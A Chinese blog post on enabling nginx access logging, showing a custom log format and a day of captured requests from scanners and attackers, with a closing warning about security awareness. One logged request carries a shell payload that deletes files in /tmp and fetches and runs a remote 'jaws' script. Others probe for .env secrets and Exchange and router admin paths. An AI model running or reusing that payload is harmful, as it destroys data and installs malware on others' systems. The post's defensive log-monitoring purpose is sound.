大家在用nginx做代理服务器的时候,一定要开启日志记录,监控是否有大量的非法访问日志
如果发现异常及时处理,避免损失。
/usr/local/nginx/conf/nginx.conf
开启日志
log_format hzsrlog ===>>>$remote_addr - $remote_user [$time_local] "$http_referer" "$request""$http_user_agent"status=$status sentsize=$body_bytes_sent time=$request_time;
access_log logs/access.log hzsrlog;
===>>>83.97.20.34 罗马尼亚布加勒斯特- - [02/Apr/2022:13:44:55 +0800] "-" "GET / HTTP/1.1" "-" status=502 sentsize=537 time=0.003
===>>>172.93.110.253美国佛罗里达迈阿密 - - [02/Apr/2022:13:47:27 +0800] "-" "GET /users/sign_in HTTP/1.1" "python-requests/2.22.0" status=404 sentsize=153 time=0.000
===>>>128.1.248.42美国加利福尼亚洛杉矶 - - [02/Apr/2022:14:02:32 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" status=502 sentsize=537 time=0.003
===>>>178.73.215.171瑞典斯德哥尔摩 - - [02/Apr/2022:14:15:43 +0800] "-" "GET / HTTP/1.0" "-" status=502 sentsize=537 time=0.002
===>>>216.244.66.240 美国华盛顿西雅图- - [02/Apr/2022:14:24:57 +0800] "-" "GET /login HTTP/1.1" "Mozilla/5.0 (compatible; DotBot/1.2; +; [email protected])" status=404 sentsize=153 time=0.000
===>>>192.241.225.73美国加利福尼亚旧金山 - - [02/Apr/2022:14:27:26 +0800] "-" "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" "Mozilla/5.0 zgrab/0.x" status=502 sentsize=537 time=0.003
===>>>37.252.88.3亚美尼亚 - - [02/Apr/2022:14:30:25 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" status=403 sentsize=555 time=0.000
===>>>187.102.96.30巴西 - - [02/Apr/2022:15:04:00 +0800] "-" "GET /shell?cd+/tmp;rm+-rf+*;wget+110.45.146.209/jaws;sh+/tmp/jaws HTTP/1.1" "Hello, world" status=404 sentsize=153 time=0.000
===>>>31.7.65.77伊朗 - - [02/Apr/2022:15:22:16 +0800] "-" "GET /owa/auth/x.js HTTP/1.1" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" status=502 sentsize=537 time=0.003
===>>>139.59.149.255德国法兰克福 - - [02/Apr/2022:15:31:59 +0800] "-" "\x05\xF1\x8D\xDBK\xB4Y\x9E\x0F3\xF7\x15z\xCE" "-" status=400 sentsize=157 time=0.010
===>>>92.53.64.29俄罗斯 - - [02/Apr/2022:15:35:57 +0800] ":80/admin/login.asp" "POST /boaform/admin/formLogin HTTP/1.1" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/ Firefox/71.0" status=404 sentsize=153 time=0.000
===>>>109.237.103.9俄罗斯伊尔库茨克 - - [02/Apr/2022:15:56:46 +0800] "-" "GET /.env HTTP/1.1" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" status=404 sentsize=555 time=0.000
===>>>194.242.56.116西班牙 - - [02/Apr/2022:16:01:50 +0800] "-" "GET / HTTP/1.1" "-" status=403 sentsize=153 time=0.000
===>>>167.94.146.60美国亚利桑那凤凰城 - - [02/Apr/2022:16:15:36 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (compatible; CensysInspect/1.1; +" status=502 sentsize=537 time=0.755
===>>>157.55.39.79美国华盛顿昆西 微软云 - - [02/Apr/2022:16:28:29 +0800] "-" "GET / HTTP/1.1" "Mozilla/5.0 (compatible; bingbot/2.0; +" status=502 sentsize=537 time=0.858
===>>>45.155.205.127荷兰德伦特 - - [02/Apr/2022:17:36:51 +0800] "-" "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" "-" status=400 sentsize=157 time=0.250
为什么服务器会被非法访问,即使你没有向别人公开访问域名,但是只要你网站用域名访问,80端口或443端口开着,就可能被攻击,这种攻击一般通过你服务器WEB应用的漏洞攻击,严重的可以控制你的电脑,前段时间log4j的日志安全事件就是个例子。
非法访问不可避免,如果你的网站很少有被非法访问,那么说明你的网站还不够优秀或者上线的时间不长,非法访问不可怕,可怕的是你没有足够的安全意识。
!!!